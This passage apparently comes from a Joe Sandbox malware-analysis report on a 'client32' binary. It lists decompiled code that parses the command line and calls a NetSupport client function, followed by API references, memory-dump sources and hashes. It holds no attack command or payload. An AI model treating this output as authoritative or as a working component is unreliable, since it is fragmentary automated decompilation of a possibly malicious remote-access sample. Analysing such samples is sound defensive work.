					} while ( *_t18 > 0x20);
					goto L9;
				}
				_t17 =  *((intOrPtr*)(_t18 + 1));
				_t18 = _t18 + 1;
				if(_t17 == 0) {
					L5:
					if( *_t18 != 0x22) {
						goto L9;
					}
					L6:
					_t18 = _t18 + 1;
					goto L9;
				}
				while(_t17 != 0x22) {
					_t17 =  *((intOrPtr*)(_t18 + 1));
					_t18 = _t18 + 1;
					if(_t17 != 0) {
						continue;
					}
					goto L5;
				}
				goto L6;
			}










                                                                                  0x0024102d
                                                                                  0x0024102f
                                                                                  0x00241033
                                                                                  0x00241056
                                                                                  0x0024105e
                                                                                  0x0024105e
                                                                                  0x00241062
                                                                                  0x00241070
                                                                                  0x00241074
                                                                                  0x0024107b
                                                                                  0x00241085
                                                                                  0x00241089
                                                                                  0x0024108b
                                                                                  0x0024108b
                                                                                  0x0024109d
                                                                                  0x002410a3
                                                                                  0x002410a3
                                                                                  0x00241064
                                                                                  0x00241068
                                                                                  0x0024106b
                                                                                  0x0024106e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0024106e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00241058
                                                                                  0x00241058
                                                                                  0x00241058
                                                                                  0x00241059
                                                                                  0x00000000
                                                                                  0x00241058
                                                                                  0x00241035
                                                                                  0x00241038
                                                                                  0x0024103b
                                                                                  0x0024104c
                                                                                  0x0024104f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00241051
                                                                                  0x00241051
                                                                                  0x00000000
                                                                                  0x00241051
                                                                                  0x00241040
                                                                                  0x00241044
                                                                                  0x00241047
                                                                                  0x0024104a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0024104a
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetCommandLineA.KERNEL32 ref: 00241027
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0024107B
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00241096
                                                                                  • ExitProcess.KERNEL32 ref: 002410A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.908983334.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                                  • Associated: 00000012.00000002.908969084.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_240000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                  • String ID:
                                                                                  • API String ID: 2164999147-0
                                                                                  • Opcode ID: f518deee625a4f1401b09f7e36e617c1d54bbcc714fecdb8b4f243cb817afd8a
                                                                                  • Instruction ID: 326e26982b5a319c54c7ad7cb4471aa6c3ed072d9968e5948479f8842ec95e57
                                                                                  • Opcode Fuzzy Hash: f518deee625a4f1401b09f7e36e617c1d54bbcc714fecdb8b4f243cb817afd8a
                                                                                  • Instruction Fuzzy Hash: 531126244143C69AEB399F6098487FABFA59F13384F643044ECD697146C25248FBCBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00241000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 17 241000-241011 _NSMClient32@8
                                                                                  C-Code - Quality: 50%
                                                                                  			E00241000(intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t3;

				_t3 = _a16;
				_push(_t3);
				_push(_a12); // executed
				L002410AA(); // executed
				return _t3;
			}




                                                                                  0x00241003
                                                                                  0x00241009
                                                                                  0x0024100a
                                                                                  0x0024100b
                                                                                  0x00241011

                                                                                  APIs
                                                                                  • _NSMClient32@8.PCICL32(?,?,?,002410A2,00000000), ref: 0024100B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.908983334.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                                  • Associated: 00000012.00000002.908969084.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_240000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Client32@8
                                                                                  • String ID:
                                                                                  • API String ID: 433899448-0
                                                                                  • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction ID: ac6e8e847334716184db461d891e6c7e50dcd06d93324d3acf64a22d43bdcee0
                                                                                  • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                  • Instruction Fuzzy Hash: 05B092B212434D9B8718EE98E841C7B339CAAA8600B000809BD0943282CA61FCB09A71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%